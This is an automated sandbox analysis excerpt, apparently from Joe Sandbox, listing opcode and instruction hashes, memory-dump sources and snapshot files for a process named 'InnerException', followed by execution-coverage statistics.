                                                            • API String ID:
                                                            • Opcode ID: 3b597992e960251b4fcf41ffce0d1967afb7001012728b305b56a73bb69854f6
                                                            • Instruction ID: c174e9f76cb218df4030022eb6e02dc9ae05bc39ed43a88c70a23f828289327b
                                                            • Opcode Fuzzy Hash: 3b597992e960251b4fcf41ffce0d1967afb7001012728b305b56a73bb69854f6
                                                            • Instruction Fuzzy Hash: 0201D8303196454FC71A9738D50462B3BA2DFC6700B1988BFE08AD72A6DD24AC41C356
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: bad8d1670b74e906e6797d6025b6ae341c53de8e0f2ae856921529f156d021d5
                                                            • Instruction ID: 71d3e1fb59c75ed1910d044dc49df18f0c8888f1953a0fea4c2b78642bba4099
                                                            • Opcode Fuzzy Hash: bad8d1670b74e906e6797d6025b6ae341c53de8e0f2ae856921529f156d021d5
                                                            • Instruction Fuzzy Hash: 79118E757002018FDB54EB39C555B6A7BE2EFC9748F28546AD806EB3A6DB31DC02CB41
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 31e97711d4d4f49d3f8fd8a59930884444ca3d8dbfd3cbb98ddf85307c4682b9
                                                            • Instruction ID: 4c6e63b90072f55b409e5e9834ae85b45814007ec06beacde5d527f9ce080c1d
                                                            • Opcode Fuzzy Hash: 31e97711d4d4f49d3f8fd8a59930884444ca3d8dbfd3cbb98ddf85307c4682b9
                                                            • Instruction Fuzzy Hash: 581180B8E01209DFCB54DFA8D549AAEBBF1FB48300F148569D819E3351E7309A41CF91
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d9ac8b3770d7afde0bf942682bd2de5f718854face53af4a6cd66a70b899274f
                                                            • Instruction ID: 0cda2d7b087ecd48245dd0561e147ffc6c81be9c63ab0b5330f96011a129b072
                                                            • Opcode Fuzzy Hash: d9ac8b3770d7afde0bf942682bd2de5f718854face53af4a6cd66a70b899274f
                                                            • Instruction Fuzzy Hash: B921B374E001298FCBA4EF28C898B9EB7F2BB49308F1451E9D81DA3785D7309E848F45
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a95365da433d74c3f61cb4ab3862b2924d60a2b9b6463606fd5e0b492cae7081
                                                            • Instruction ID: 88a2d7e27c82e5fa9e6845f22a6c6b23531e4abd940e43f98a84fed3bfef4b7d
                                                            • Opcode Fuzzy Hash: a95365da433d74c3f61cb4ab3862b2924d60a2b9b6463606fd5e0b492cae7081
                                                            • Instruction Fuzzy Hash: 6511F3B4E002099FCB44DFA9C9466AFBBF1FF88300F60806A9518A7354EB349A418B91
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3337ac068962cad6e37a727244aa190403c56590846e93335eaf0bd07b83c8a0
                                                            • Instruction ID: c7789387914841d79a50635b4d6f4e4385d1943ab882b1ad0501436bbca05bbc
                                                            • Opcode Fuzzy Hash: 3337ac068962cad6e37a727244aa190403c56590846e93335eaf0bd07b83c8a0
                                                            • Instruction Fuzzy Hash: AAF024207042089BCF219A34D4257EE3BA0EFC7315F2060DAE10197382CA208846C351
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1fe805824caf9e7025451b89a1bb0bc2cbd4f9399137a6a30ea81bda0061163e
                                                            • Instruction ID: fdbae8b2938490e8e2a9cf84301a2d5bb458c1d4f2276c781989621fea8b7ea4
                                                            • Opcode Fuzzy Hash: 1fe805824caf9e7025451b89a1bb0bc2cbd4f9399137a6a30ea81bda0061163e
                                                            • Instruction Fuzzy Hash: 0611E874E042188FCBA4DF68D94969AB7B2FF89304F1051E6980EA7385D770AE85CF51
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 97d5b2fb5e055eb289a2a6867b229366e7fa6bba837d4e648729149bb57cfd85
                                                            • Instruction ID: 8ded7780eaeaf9779ce81c243e6062adadeba1bf0f7b191d806400bfd92d720f
                                                            • Opcode Fuzzy Hash: 97d5b2fb5e055eb289a2a6867b229366e7fa6bba837d4e648729149bb57cfd85
                                                            • Instruction Fuzzy Hash: 3F110970A04219CFDBA8DF18C898B9AB3B5EB4A308F1040E5D40EA3786D7349E84CF42
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: aceb4b82c207f4b93b95c1352173670b1e37e29e9aa27331b79a06815e26e214
                                                            • Instruction ID: 8e1378d8b3c7e9be599ea3af5015c86607f45f701d55e09a921ab7cfcf266f1b
                                                            • Opcode Fuzzy Hash: aceb4b82c207f4b93b95c1352173670b1e37e29e9aa27331b79a06815e26e214
                                                            • Instruction Fuzzy Hash: BDF08272A102099BDB05DB64C855AEFFBFA9B84300F45852AD502BB390DEB0590A86C1
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a36c0a57d51df491ec1cdbe1cf2f0b80f4b414f8abf06582b4679eed84c4eda0
                                                            • Instruction ID: 23de742c516c89636363c6a98077650914eb815c8b1c567a248b5634aaacab8b
                                                            • Opcode Fuzzy Hash: a36c0a57d51df491ec1cdbe1cf2f0b80f4b414f8abf06582b4679eed84c4eda0
                                                            • Instruction Fuzzy Hash: 32F01239E082298FCBA4DE24D8843E9B3B4EB48314F1091E6D81DA3286C7349E948F80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ef9aba44a84281b4acdfc49ae72f1a2b939586948f00d23afdb6601027d2240
                                                            • Instruction ID: ce9501cd2f0d265b0a6572babec0fcccf99694cc5330767c8b08644a95a5b7ce
                                                            • Opcode Fuzzy Hash: 9ef9aba44a84281b4acdfc49ae72f1a2b939586948f00d23afdb6601027d2240
                                                            • Instruction Fuzzy Hash: AFE0D87460D1849FC75ACB94D9105B97F75DB46312F2491DA9858AB382C9364E43DB00
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction ID: 7c2073420e0a695ed2c594e2f586293894854a8990ffb554b56bd435f675ce5b
                                                            • Opcode Fuzzy Hash: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction Fuzzy Hash: 0DE0C974D05208EFCB84DFA8D540A9CBBF5EF98310F10C1A99808A3350DB759A55DF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction ID: 6d9e4f705e1e63f0f2b6c16bb431a5af88183d7ec658b14646c685c807004e8f
                                                            • Opcode Fuzzy Hash: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction Fuzzy Hash: C0E0C274E09208EFCB84DFA9D941AADBBF4EB58310F20C1AA9918A3350D7359A51DF81
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b63d3dbe47468e804b0e4e0eca743b0e36ed7f66fb3147667e5ae26c961cbdf0
                                                            • Instruction ID: 341cc533c753ce83fdf8e2a3fff0ff120c9ca551781501ca237d3521c511bc8d
                                                            • Opcode Fuzzy Hash: b63d3dbe47468e804b0e4e0eca743b0e36ed7f66fb3147667e5ae26c961cbdf0
                                                            • Instruction Fuzzy Hash: 22F0F470A00114CFDB58EF14D949BAA73F6FB49305F2490D5944EA7385CB349E85CF91
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction ID: 02fe9251a8156bcf3cb72099c97798769d9c78e09171f0d1b1bda324b617437f
                                                            • Opcode Fuzzy Hash: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction Fuzzy Hash: 1BE0A574D05208AFCB84DFA8D940A9CBBB5AB58315F10C1A99808A3350D7369A51EF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction ID: b5efa7f0d287bb0ad6e39c37d9d6b6c6c187868cdea2886db7719d2dae614835
                                                            • Opcode Fuzzy Hash: 2e20c89c8c566ad015826f9c96d208aee947713c077c56ce3138a1ef97e8be07
                                                            • Instruction Fuzzy Hash: D6E0C974D05208EFCB94DFA8D550A9CBBF5EB58310F10C1A99C18A3351D7359A51DF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c23eee46c46bd39b489107da84deabacf1dd62750f27a4d00e8b585d77966a28
                                                            • Instruction ID: 06c0b586221b1170dc36b023f64e4513f04c86b95f75b4ce4f2b47adef6cc5a1
                                                            • Opcode Fuzzy Hash: c23eee46c46bd39b489107da84deabacf1dd62750f27a4d00e8b585d77966a28
                                                            • Instruction Fuzzy Hash: 19E0E574E0520CEFCB84DFA8D5446ACBBF4EF48310F24C1A99808A3340DB359A46DF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 19ec5b692ca3c51755c5f923492388d36dd9a9800e282225e26c255b118ad673
                                                            • Instruction ID: c4187fb328bb2fe6116d89f35fcf212c4d23d6a9e202363735cfb35962add693
                                                            • Opcode Fuzzy Hash: 19ec5b692ca3c51755c5f923492388d36dd9a9800e282225e26c255b118ad673
                                                            • Instruction Fuzzy Hash: B0E026524092D05ADB13DBB895911883F30CFD2304B5610D3C54CEE017C911494FC363
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1a9b07bb7dbf9d0b65b82bc85ac0593999f3f5cd078f2f07ef868200e2c0d594
                                                            • Instruction ID: 501459633954253ebe74eb86ea21af905ab361d6d457db150c0528e8b2b6f462
                                                            • Opcode Fuzzy Hash: 1a9b07bb7dbf9d0b65b82bc85ac0593999f3f5cd078f2f07ef868200e2c0d594
                                                            • Instruction Fuzzy Hash: 26F05F74D19229CFDB21DF54C9987DDBBB1FB48315F1062E6D40AB2380C7755A818F15
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 23cbd20ed3ef03c231aa41bd1e812fc04b9ca69f754721037c3cd804f75e58c6
                                                            • Instruction ID: e7db51ea61b920a251141b86f89be9b32af31cc3c16e9405dd906f97ee4b7d91
                                                            • Opcode Fuzzy Hash: 23cbd20ed3ef03c231aa41bd1e812fc04b9ca69f754721037c3cd804f75e58c6
                                                            • Instruction Fuzzy Hash: 94E0E570D05208EFCB54DFA8D54469DBBB5EB48301F6081BAD808A2310E7355E51EF80
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a9b8aed8a15b4543651cd5d21b406fd5524ad8e7bc19bcbf7847d7e61627fde2
                                                            • Instruction ID: a27edf3d208009eeff8ab2cf1e0e5f81f7d2c6dceff1cc5183b4211ac81f8e6c
                                                            • Opcode Fuzzy Hash: a9b8aed8a15b4543651cd5d21b406fd5524ad8e7bc19bcbf7847d7e61627fde2
                                                            • Instruction Fuzzy Hash: C9E08C35B042608FC751AB78A85865D3BE1AF8A23031105E1E819DB2F6FA38AC02D7A1
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d43c1e9d31d69609a2de184231896c15cefe916d0bf2848a5d95f5d2f1004f27
                                                            • Instruction ID: a0767b3cd4a7a35784d2665973b6eb90b98fd0237f886170d1aaebe9feb43ef6
                                                            • Opcode Fuzzy Hash: d43c1e9d31d69609a2de184231896c15cefe916d0bf2848a5d95f5d2f1004f27
                                                            • Instruction Fuzzy Hash: D2E08678909108EFC704DF94D9409EDBFB8EB45311F24D1AADC4867341D6319E42EB90
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 443805ea6c6639bbdd64790dd70abe9d307736ecd1787e722924076da4a2f2ea
                                                            • Instruction ID: 0dadcc4c91c6de4a8c55e2fc46dd22507b42e6ddbf4dd64c3418509e908b09e8
                                                            • Opcode Fuzzy Hash: 443805ea6c6639bbdd64790dd70abe9d307736ecd1787e722924076da4a2f2ea
                                                            • Instruction Fuzzy Hash: E6E01A34D05108AFC784DF98D5805ACBBB4AB48224F2481AD980853341DA355A41DB84
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 4b195f91f0f91947a21b8efa3de3e8cc5166c214b96c0700034c3792144576cf
                                                            • Instruction ID: 37cbf9ba0f5c7a54a1b1a5d366e6b5362544adf122d5fe03a3c04be8c8d8c008
                                                            • Opcode Fuzzy Hash: 4b195f91f0f91947a21b8efa3de3e8cc5166c214b96c0700034c3792144576cf
                                                            • Instruction Fuzzy Hash: B1E0123490A108DFCB44DFE4DA55AACBBB8EB85315F6081ADDC0927351DB315E46DB81
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b3ac042cceb69c0fa3612ebd6b25a9d66ac8f9d7db38dd49b2c8fe2e889ff134
                                                            • Instruction ID: bf54cfa30db5a5fc6c2fed1fa16a9d673b84b214b19886119f86b9a37815f273
                                                            • Opcode Fuzzy Hash: b3ac042cceb69c0fa3612ebd6b25a9d66ac8f9d7db38dd49b2c8fe2e889ff134
                                                            • Instruction Fuzzy Hash: 3BF03970A04158CFC758AF24D8AC7AA77B1EF85315F2481D8A20EB72C2CB755E898F56
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: f504f476b7797e46a6f73bdd720d426c2bbc11fe2d67a8036ecaa4fcd18ccddc
                                                            • Instruction ID: 9d83f8e0ef1818affbcd3c5c5de56c8e3b79ed71dcb3f645f2c0abd948ed09cc
                                                            • Opcode Fuzzy Hash: f504f476b7797e46a6f73bdd720d426c2bbc11fe2d67a8036ecaa4fcd18ccddc
                                                            • Instruction Fuzzy Hash: 1CE012B1942208EBC741EFF9C505A9E7BE9EF45211F5045B5D505D7110EE314B44E792
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 03b922ce0aad3b42c2d7bbaee65112a7e5c767afcfb51e845a993e06b5ca78fc
                                                            • Instruction ID: c6c048803186877455a4e0353b5bfaece2e2e2339102d32ea938bfa84be613b8
                                                            • Opcode Fuzzy Hash: 03b922ce0aad3b42c2d7bbaee65112a7e5c767afcfb51e845a993e06b5ca78fc
                                                            • Instruction Fuzzy Hash: 08D05E70D05208EBCB44CFA4D0409ACB7B2EF14301B1091A6EC0532310DB324E11DF40
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc7902a630ad6782c322c5f39a652787cff6d121d76e0c2af38bf0998b68abf1
                                                            • Instruction ID: 72be75536e7f681e036deb8b3cef32f6a65c146550c7386948bcf934541c7918
                                                            • Opcode Fuzzy Hash: fc7902a630ad6782c322c5f39a652787cff6d121d76e0c2af38bf0998b68abf1
                                                            • Instruction Fuzzy Hash: 09D0123404E3C55FC703C734D494489BF709F0311432905DBC489CF463C2129418CB12
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c81d1884c73acd72181f8873965e27e18aa3523fec936cec8b4dd4588f90d4fe
                                                            • Instruction ID: 40ca82e47a94af27003c1690ae0d682ded88cdfe59afc308515bfed07d7e916e
                                                            • Opcode Fuzzy Hash: c81d1884c73acd72181f8873965e27e18aa3523fec936cec8b4dd4588f90d4fe
                                                            • Instruction Fuzzy Hash: F5C04C314297804FDB43E7F094E48953F71AF5B31535558C6C085CA472CA11544AEB22
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c0b730eec4bbdf139a71c91964a8ee64d9d676403aa8432102ffd78f751571ef
                                                            • Instruction ID: f9ab8f1ba72a8a2aee767e79b527b66f9d56ad5f0d8db48c058b7498db5186db
                                                            • Opcode Fuzzy Hash: c0b730eec4bbdf139a71c91964a8ee64d9d676403aa8432102ffd78f751571ef
                                                            • Instruction Fuzzy Hash: 4D90027104460D8F454027967A09659B75CD6445257800051A90D525515A55A4244695
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJjq$[2*$jjjjjj$$eq$$eq$Uv
                                                            • API String ID: 0-37053438
                                                            • Opcode ID: 47d4880ce1c6af7ff5bd8624fb92dfa1cceab5ca3ac1c2347d461171249e2357
                                                            • Instruction ID: 69552ae0658eba6b9272372bd59eba131736b03dfe2399199673dc2bcffb745d
                                                            • Opcode Fuzzy Hash: 47d4880ce1c6af7ff5bd8624fb92dfa1cceab5ca3ac1c2347d461171249e2357
                                                            • Instruction Fuzzy Hash: 10B0922140E381CFC7524E6599C1040BF60AA62140318C5EEC4D54E457C1208686EB21
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJjq$[2*$jjjjjj$$eq$$eq$Uv
                                                            • API String ID: 0-37053438
                                                            • Opcode ID: eab4ca3b0cc3f85893e6c46b13c33076e19876c6e65349a56cc98167e0588199
                                                            • Instruction ID: aeecc1ffa3aaa88a5e50b4a22a33ad20c5a6ee74ed52b33e18a38e7888f6bfe2
                                                            • Opcode Fuzzy Hash: eab4ca3b0cc3f85893e6c46b13c33076e19876c6e65349a56cc98167e0588199
                                                            • Instruction Fuzzy Hash: D7B01230606140C9E7088A10C4801A43330FF42305734916BC00B1E201C630C483D611
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2168261995.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_ed0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: TJjq$[2*$jjjjjj$$eq$$eq$Uv
                                                            • API String ID: 0-37053438
                                                            • Opcode ID: fd5638494260c9eade39c6dbe4842e2102355da976df6396d99e65cca1bfd728
                                                            • Instruction ID: 8f0c81fb178da21b297a2a94fa39926d1dee257bc652a859f25018e204900149
                                                            • Opcode Fuzzy Hash: fd5638494260c9eade39c6dbe4842e2102355da976df6396d99e65cca1bfd728
                                                            • Instruction Fuzzy Hash: C4B092B0A06344CF8705CA00C1904A47370FF9224032591AEC0071E01282308A83EA02
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000004.00000002.2209024728.00000000061B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 061B0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_4_2_61b0000_InnerException.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: !$"$(oeq$\seq
                                                            • API String ID: 0-391823324
                                                            • Opcode ID: e6caffcbea7cc6ffb140084cd9c306b008c721456b571b60c1e940fae8d39e22
                                                            • Instruction ID: e774e71f4334e73b24b130f197be134735eda11dca0bfceec4392917085e563f
                                                            • Opcode Fuzzy Hash: e6caffcbea7cc6ffb140084cd9c306b008c721456b571b60c1e940fae8d39e22
                                                            • Instruction Fuzzy Hash: A5310570E0426C9FEB65CF65C845BEEBBB1FF89311F4084AAC519A7244DB701A85DF81

                                                            Execution Graph

                                                            Execution Coverage:11.8%
                                                            Dynamic/Decrypted Code Coverage:100%
                                                            Signature Coverage:0%
                                                            Total number of Nodes:28
                                                            Total number of Limit Nodes:5
